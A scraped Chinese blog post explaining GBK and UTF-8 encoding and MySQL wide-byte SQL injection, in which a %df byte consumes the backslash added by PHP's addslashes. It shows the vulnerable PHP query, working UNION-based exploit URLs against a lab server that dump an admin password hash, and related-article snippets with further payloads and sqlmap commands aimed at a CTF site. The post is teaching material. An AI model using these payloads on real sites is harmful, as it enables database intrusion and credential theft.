MySQL 宽字节注入——关于GBK编码和UTF-8编码

最新推荐文章于 2024-08-23 17:37:15 发布
最新推荐文章于 2024-08-23 17:37:15 发布
阅读量5.1k 收藏 1
点赞数 1
分类专栏: 安全 文章标签: 编码 utf-8 ascii
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/68952300
版权

参考:
http://blog.csdn.net/jnbbwyth/article/details/6991425
https://www.leavesongs.com/PENETRATION/mutibyte-sql-inject.html

关于GBK编码和UTF-8编码

这个文件原文只有ASCII字符,当我加上两个汉字之后就不得不变成了UTF-8字符。
这里写图片描述

iconv这个工具(MacOS, ubuntu和kali好像是自带的)可以用来转换编码。
比如,将一个文件从utf-8编码格式转换成gbk编码格式。注意要写明输出的文件名(-o),不然会输出到标准输出。

iconv -f utf-8 -t gbk coding_test.php -o coding_test.php

这里写图片描述
利用xxd这个工具可以发现,在utf-8编码方式下,通过e5928c这个三个字节来表示一个汉字”和”;而在gbk编码方式下,通过bacd这两个字节来表示一个汉字”和”。由于汉字无法通过ASCII编码显示出来,于是xxd右边用...来表示几个字节。

MySQL 宽字节注入

加单引号不报错,说明不存在注入
这里写图片描述
这里写图片描述
在这个sql语句前面,我们使用了一个addslashes函数,将$id的值转义。这是通常cms中对sql注入进行的操作,只要我们的输入参数在单引号中,就逃逸不出单引号的限制,无法注入。

$id = isset($_GET['id']) ? addslashes($_GET['id']) : 1;
$sql = "SELECT * FROM news WHERE tid='{$id}'";

那么怎么逃过addslashes的限制?众所周知addslashes函数产生的效果就是,让'变成\',让引号变得不再是“单引号”,只是一撇而已。一般绕过方式就是,想办法处理\'前面的\

  1. 想办法给\前面再加一个\(或单数个即可),变成\\’,这样\被转义了,于是'逃出了限制。
  2. 想办法把\弄没有

于是构造一个EXP。
http://192.168.10.163/data_and_sql/0x01/index.php?id=-1%a1%27UNION+Select+1,2,concat(name,0x23,pass)+FROM+admin#
这里写图片描述
这样还是不行。注意要把末尾的#urlencode一下。
http://192.168.10.163/data_and_sql/0x01/index.php?id=-1%df%27%20union%20select%201,2,concat(name,0x23,pass)%20from%20admin%23
这里写图片描述

MariaDB [test]> select concat(name,0x23,pass) from admin;
+----------------------------------------+
| concat(name,0x23,pass)                 |
+----------------------------------------+
| admin#21232f297a57a5a743894a0e4a801fc3 |
+----------------------------------------+
1 row in set (0.00 sec)

其中0x23代表#concat(param1,param2,param3)表示将这三个参数连接起来。

关于

mysql_set_charset("utf8",$link);
mysql_query("SET NAMES 'UTF8'");

这两行的区别。
mysql_set_charset("utf8",$link);其实做了mysql_query("SET NAMES 'UTF8'");它做的事。而且后者并不被PHP官方建议。PHP官方建议使用前者,也就是mysql_set_charset("utf8",$link);
PHP PDO: charset, set names?
“set names” vs mysqli_set_charset — besides affecting mysqli_escape_string, are they identical?

caiqiiqi
关注
专栏目录
gbk injection
sworddancing is the best one
09-27 977
以下是我在南邮上做的一道宽字节注入题,先将笔记总结于下,题目:   将网址复制下来,因为这将是我们进行注入的数据库的位置所在,因为该题提示是gbk数据库,所以咱们就有利用宽字节注入来解题的思路,接下来咱们用到sql注入工具的一款,sqlmap: 首先我们需要爆出数据库命令如下(爆出当前数据库(%df%27是双字节不转义单引号实现注入的方法--原理我会另外总结一片笔记出来链接:https://b...
宽字节注入
rane的博客
03-18 300
宽字节注入原理 宽字节注入方法 以第32关为例,输入单引号后会经过check_addslashes函数替换 数据库连接的时候使用的是gbk编码 http://127.0.0.1/Less-32/?id=1%df’ order by 3–+ 三列 http://127.0.0.1/Less-32/?id=-1%df’ union select 1,2,version()–+ 使用union查询需...
MySQLGBKUTF-8的区别
Mars Suburbs People
02-11 355
MySQL中,如果数据库只需要支持一般中文,数据量很大,性能要求也比较高,那么就最好选择GBK,因为相对于UTF-8而言,GBK占用的空间较 小,每个汉字只占2个字节,而UTF-8汉字编码需要3个字节,这样可以减少磁盘I/O、数据库cache,以及网络传输的时间,从而提高性能,相反,如 果数据库主要处理英文,则建议采用UTF-8,因为GBK对英文字符编码也采用2个字节,而UTF-8只需要一个字...
MySQL 相关知识笔记
最新发布
weixin_68929783的博客
08-23 3192
以上是根据 B 站黑马课程学习后的 MySQL 笔记,为了日后复习和给别人参考而整理,希望对大家有所帮助。同时,在实际应用中,还需要根据具体情况合理使用索引、约束等功能,以提高数据库的性能和数据的完整性。
gbk双字节注入
左手诗人 右手剑客
06-12 376
<?php //连接数据库部分,注意使用了gbk编码 $conn = mysql_connect('localhost', 'root', 'toor!@#$') or die('bad!'); mysql_query("SET NAMES 'gbk'"); mysql_select_db('test', $conn) OR emMsg("连接数据库失败,未找到您填写的数据库");...
MySQL 宽字节注入
m_de_g的博客
12-11 891
MySQL 宽字节注入 1.宽字节诸如基础 GBK占用两字节 ASCII占用一字节 PHP中编码GBK,函数执行添加的是ASCII编码MySQL默认字符集是GBK等宽字节字符集。 %DF':会被PHP当中的addslashes函数转义为"%DF","“既URL里的“%5C”,那也就是说,“%DF”会被转成“%DF%5C%27”倘若网站的字符集是GBKMySQL使用的编码也是GBK的话,就会认为“%DF%5C%27”是一个宽字节。也就是”運'" URL在线解密工具链接: http://tool.chin
南邮宽字节(sql_gbk)注入
Cosmopolitan的博客
08-28 965
首先题目过滤了单引号,先绕过,用%d6%27来绕过,构成一个宽字节,取消了单引号的转义,直接上sqlmap 爆数据库: python sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=2%d6%27" --current-db 爆表名: python sqlmap.py -u "http://chinalove...
sqli-labs学习笔记(十一)less 32-37 宽字节注入
闵行小鱼塘
09-18 717
继续学习sqli-labs,本篇是less 32-37
Sql漏洞注入之宽字节注入
Matheus的博客
07-30 610
绕过–宽字节注入攻击 宽字节注入攻击 由于sql注入的盛行,不少网站管理员都意识到了这种攻击方式的厉害,纷纷想出不少办法来避免,例如使用一些 Mysql 中转义的函数 addslashes,mysql_real_escape_string, mysql_escape_string等等。其实这些函数就是为了过滤用户输入的一些数据,对特殊的字符加上反斜杠“\”进行转义。 Addslashes()函数:对get、post、cookie等传递的参数中的’、“、\、null等进行转义 mysql_real_esca
**浅谈宽字节注入编码**
qq_42948704的博客
07-22 617
0x01 了解编码基础 首先了解一下什么是编码编码主要是存储到计算机硬件当中的一组用来表示事物 的数据,例如:a的ascii编码是97,那么数据a通过ascii编码存储到计算机中就是 97 AsciiAscii作为最早的编码由美国人提出,从0-127一共128个字符,只包括了33个控 制码以及数字、大小写字母和符号 GBK编码 GBK编码是由于ascii的局限性,无法用编码表示汉字以及中文符号,由国人提出 的一套编码方式,用一、二、四字节编码,英文字符一般用一字节表示,一般汉字 字符用两字节
【基础篇】第01篇:PHP代码审计笔记--SQL注入1
08-03
- 示例代码展示了如何使用`iconv`函数进行编码转换,从UTF-8转为GBK。在进行数据库查询之前进行这种转换可以防止宽字节注入,但需要确保正确处理所有可能的编码问题。 5. **最佳实践** - 使用预编译语句(如`PDO`...
mysql gbk utf8_MySQL utf8存储 GBK读取,该如何解决
weixin_42298105的博客
02-17 398
mysql utf8存储 GBK读取我的MySQL数据库用的是清一色的utf8,见表语句如下,存储引擎MyISAM,但是我把该表的三个相关文件拷贝给一个朋友,他的数据库安装时选得时GBK(没改过)。在他那里中文可以正常显示,按照我的想法是,我的数据表用的是utf8,他用GBK读出来应该是乱码。为什么没有乱码。而且在他那里查看该表的信息依然是utf8的。求解释。mysql> show cre...
gbk字符编码和宽字节sql注入
sworddancing is the best one
09-27 2614
ctf题目中宽字节注入是很常见的问题,我这篇文章的目的就是弄明白其中的原理。 通常来说,一个gbk编码的汉字通常占用两个字节,一个utf-8编码汉字,占用三个字节, 占用3个字节。在php中,我们可以通过输出 echo strlen("和"); 来测试。当将页面编码保存为gbk时输出2,utf-8时输出3。   说了这么多废话,现在来研究一下在SQL注入中,gbk字符编码带来的各种...
mysql gbk编码 字节数_MySql中UTF8 和 GBK 编码中文字符长度问题
weixin_31841431的博客
01-27 387
为什么要了解MySql中UTF8 和 GBK 编码中文字符长度呢?举个例子,在oracle中用utf8 字段中文长度为1的话,需要char(3),mysql中则是char(1),如果你按照oracle的做法去创建mysql字段,是不是在mysql表中创建的长度大小与自己锁想的不一样呢,所以这个小知识点还是有必要了解的。我在经过实验后得到以下结论(适用MySQL 5.0以上版本):1.一个汉字占多少...
mysql宽字节数_sql宽字节简介
weixin_36380063的博客
02-08 228
宽字节注入其实在SQL注入是一个比较常见的注入,但是有时候很长时间没有遇到宽字节注入,突然出现了一个宽字节注入,就是返回去翻资料,还不如自己写篇文章记录一下。宽字节的注入,sqlmap也是无法识别出来的。需要说明的是,本文的资料主要是来自于P神的浅析白盒审计中的字符编码及SQL注入,只是对其中内容稍有修改。简介在将sql宽字节注入之前,需要对字符编码有所了解,常见的gbkutf-8、unicod...
mysql+gbk存储_Mysql以utf8存储gbk输出的实现方法提供
weixin_42405371的博客
02-02 218
一个站有可能经历gb2312(gbk,big5)到utf8的转换过程,其中会遇到很多的问题。站点太庞大了怎么办呢,只能一步步来了。要是能在极少改动前端代码的情况下,先完成数据的转换将会使整件事情容易得多。经过几天测试终于发现,Mysql以utf8存储gbk输出是可以实现的。mysql4.1后都有个特性,可以指定当前客户端连接所使用的字符集,mysql默认都是latin1,或由mysqlserve...
MYSQL之UTF8sql文件导入GBK编码的数据库最简单办法
weixin_39600768的博客
02-18 3559
最近要将一个300M的UTF-8的.sql文件导入编码格式为GBKMYSQL数据库,以前有个办法就是复制UTF8编码内容到WINDOWS自带的记事本中,然后另存为ANSI编码即可; 现在的问题的是,记事本打不开这个300M的文件,至少我是没有耐心等到它打开了,那这个办法也没有用了,网上找了找,也没有发现有用的办法,得了,自己想吧。 因为我使用的PHP语言,正好就想起PHP有个ico...
8.宽字节注入
kinght的博客
08-26 535
title: 8.宽字节注入 date: 2020-08-18 14:05:00 categories: 4.网络安全 1.Web安全 1.SQL注入 tags: 1.Web安全 2.SQL注入 在一些特定的场景,常规语句不能直接进行注入,但是因为程序代码开发存在一些瑕疵,我们可以使用PHP的一些特性进行注入,比如这次的宽字节注入 宽字节注入原理 什么是宽字节? 如果一个字符其大小为1个字节的称为窄字节,如果为两个字符的就被称为宽字节 一个字节有八个bit,有255种组成方式,英文由于只有24个字.
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值